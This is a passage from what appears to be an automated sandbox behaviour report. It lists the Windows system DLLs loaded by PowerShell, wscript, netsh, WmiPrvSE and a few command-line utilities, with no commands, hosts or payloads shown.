            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\doskey.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\doskey.exeSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winlangdb.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47mrm.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: globinputhost.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: input.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: devobj.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: netsetupapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: netsetupengine.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
